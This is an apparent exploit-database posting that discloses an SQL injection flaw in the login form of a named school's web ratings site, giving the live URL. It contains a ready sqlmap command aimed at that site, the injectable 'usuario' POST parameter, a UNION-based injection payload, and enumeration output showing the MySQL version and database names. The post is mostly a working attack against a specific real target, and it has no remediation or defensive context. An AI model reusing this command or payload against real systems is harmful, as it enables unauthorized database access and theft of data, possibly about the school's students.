Santo Domingo School (CSD) / Web Ratings | SQL Injection Vulnerability

# Exploit Title: Santo Domingo School (CSD) / Web Ratings | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "http://csd.atenas.tech/login.html" --form --dbs --batch
---------------------------------------------------------------------------------------------------

.tech is the internet's new generic top-level domain for IT professionals, web developers, software engineers, project managers, and UX designers.

Santo Domingo School (CSD)

Web Ratings

http://csd.atenas.tech/login.html

---
Parameter: usuario (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: usuario=rXpi' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qxqxq','mGxiNZtQyMjBiWOgBcfVyIGbwYfYUFiMVrIPuAox'),'qpjxq'),NULL,NULL,NULL-- GxFw&clave=&recuerdame=on
---

the back-end DBMS is MySQL
web application technology: PHP, Apache
the back-end DBMS: MySQL 5 (Percona fork)
banner: '5.6.41-84.1'

available databases [2]:                                                             
[+] atenaste_csd
[+] information_schema